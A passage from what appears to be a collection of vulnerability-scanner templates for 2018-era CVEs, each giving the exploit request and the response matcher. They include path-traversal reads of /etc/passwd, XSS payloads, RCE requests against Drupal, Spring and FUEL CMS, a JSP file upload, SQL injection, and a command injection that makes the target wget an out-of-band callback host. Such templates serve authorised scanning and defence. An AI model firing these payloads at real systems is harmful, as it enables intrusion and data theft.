Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0114","info":{"name":"Microsoft FrontPage Extensions Check (shtml.dll)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_vti_inf.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["_vti_bin/shtml.dll"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000856","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /segments/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n","GET /segments/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16670","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/user/values.xml?var=STATUS"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["<values><variable><id>","Reader.STATUS"],"condition":"and"}]}]},{"id":"CVE-2018-7600","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\nReferer:  {{Hostname}}/user/register\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#post_render][]\"\n\npassthru\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#type]\"\n\nmarkup\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#markup]\"\n\ncat /etc/passwd\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"form_id\"\n\nuser_register_form\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"_drupal_ajax\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18777","info":{"name":"Microstrategy Web 7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6910","info":{"name":"DedeCMS 5.7 - Path Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/include/downmix.inc.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["downmix.inc.php","Call to undefined function helper()"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14918","info":{"name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18608","info":{"name":"DedeCMS 5.7 SP2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>","DedeCMS Error Warning!"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16139","info":{"name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>prompt(document.domain)</script>.xrf"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20462","info":{"name":"WordPress JSmol2WP <=1.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9161","info":{"name":"PrismaWEB - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/scripts/login_par.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["txtChkUser","txtChkPassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7653","info":{"name":"YzmCMS v3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","YzmCMS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5715","info":{"name":"SugarCRM 3.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&\"/><script>alert(1)</script>=&\"><< Back</a><br><br>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20011","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/category.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=\n","GET /assets/categories.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-14574","info":{"name":"Django - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//www.interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://www.interact.sh","Location: http://www.interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2018-3167","info":{"name":"Oracle E-Business Suite - Blind SSRF","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/OA_HTML/lcmServiceController.jsp"],"body":"<!DOCTYPE root PUBLIC \"-//B/A/EN\" \"http://interact.sh\">","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unexpected text in DTD"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17153","info":{"name":"Western Digital MyCloud NAS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /web/google_analytics.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: isAdmin=1; username=admin;\n\ncmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23\n"],"matchers":[{"type":"dsl","dsl":["regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\", body)","contains(body, \"ganalytics\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-1207","info":{"name":"Dell iDRAC7/8 Devices - Remote Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"],"matchers":[{"type":"word","part":"response","words":["calling init: /lib/"]}]}]},{"id":"CVE-2018-19287","info":{"name":"WordPress Ninja Forms <3.3.18 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\"><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Begin Date\" value=\"\\\"><img src=x onerror=alert(document.domain);//\">"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19751","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/ssl-fields/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test\n","GET /admin/ssl-fields/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19137","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&really_del"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000600","info":{"name":"Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-15961","info":{"name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\nContent-Type: image/jpeg\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2018-15961\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"path\"\n\n{{randstr}}.jsp\n-----------------------------24464570528145--\n","GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["ddbb3e76f92e78c445c8ecb392beb225"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6200","info":{"name":"vBulletin - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirector.php?url=https://interact.sh","{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<meta http-equiv=\"refresh\" content=\"0; URL=https://interact.sh\">"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17431","info":{"name":"Comodo Unified Threat Management Web Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n","GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Configuration has been altered"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15535","info":{"name":"Responsive FileManager <9.13.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1273","info":{"name":"Spring Data Commons - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /account HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\n\nname[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n"],"payloads":{"command":["cat /etc/passwd","type C:\\/Windows\\/win.ini"]},"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"}]}]},{"id":"CVE-2018-3238","info":{"name":"Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Variables.cs_imagedir"],"condition":"and"}]}]},{"id":"CVE-2018-8770","info":{"name":"Cobub Razor 0.8.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/generate.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ","/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18570","info":{"name":"Planon <Live Build 41 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18925","info":{"name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/passwd;\n","GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/dummy;\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 500 && status_code_2 == 200 && contains(body_2, \"<meta name=\\\"author\\\" content=\\\"Gogs\\\" />\")"]}]}]},{"id":"CVE-2018-12095","info":{"name":"OEcms 3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16288","info":{"name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9845","info":{"name":"Etherpad Lite <1.6.4 - Admin Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Etherpad version","Plugin manager","Installed parts"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5316","info":{"name":"WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script>\"><script>alert(document.domain)</script>","Authenticate your card"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10095","info":{"name":"Dolibarr <7.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13980","info":{"name":"Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6184","info":{"name":"Zeit Next.js <4.2.3 -  Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10141","info":{"name":"Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var valueUser = \"j\";-alert(1)-\"x\";"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17422","info":{"name":"DotCMS < 5.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com","{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["self.location = 'http://evil.com'","location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"]}]}]},{"id":"CVE-2018-7490","info":{"name":"uWSGI PHP Plugin Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19877","info":{"name":"Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>confirm(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8033","info":{"name":"Apache OFBiz 16.11.04 - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18323","info":{"name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8006","info":{"name":"Apache ActiveMQ <=5.15.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(\"1\")</script>"]},{"type":"word","part":"header","words":["/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16167","info":{"name":"LogonTracer <=1.2.0 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-13379","info":{"name":"Fortinet FortiOS - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"],"matchers":[{"type":"regex","part":"body","regex":["^var fgt_lang ="]}]}]},{"id":"CVE-2018-7662","info":{"name":"CouchCMS <= 2.0 - Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/mysql2i/mysql2i.func.php","{{BaseURL}}/addons/phpmailer/phpmailer.php"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["mysql2i.func.php on line 10","Fatal error: Cannot redeclare mysql_affected_rows() in"],"condition":"and"},{"type":"word","part":"body","words":["phpmailer.php on line 10","Fatal error: Call to a menber function add_event_listener() on a non-object in"],"condition":"and"}]}]},{"id":"CVE-2018-18069","info":{"name":"WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin.php"],"body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\"><script>alert(0);</script>\n","host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(tolower(header), \"text/html\")","contains(set_cookie, \"_icl_current_admin_language\")","contains(body, \"\\\"><script>alert(0);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2018-20608","info":{"name":"Imcat 4.4 - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2018-6008","info":{"name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11231","info":{"name":"Opencart Divido - Sql Injection","severity":"high"},"requests":[{"raw":["POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\nHost: {{Hostname}}\n\n{\"metadata\":{\"order_id\":\"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10956","info":{"name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20009","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=\n","GET /assets/ssl-providers.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-16763","info":{"name":"FUEL CMS 1.4.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14728","info":{"name":"Responsive filemanager 9.13.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/filemanager/upload.php"],"body":"fldr=&url=file:///etc/passwd","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-19365","info":{"name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5233","info":{"name":"Grav CMS <1.3.0 - Cross-Site 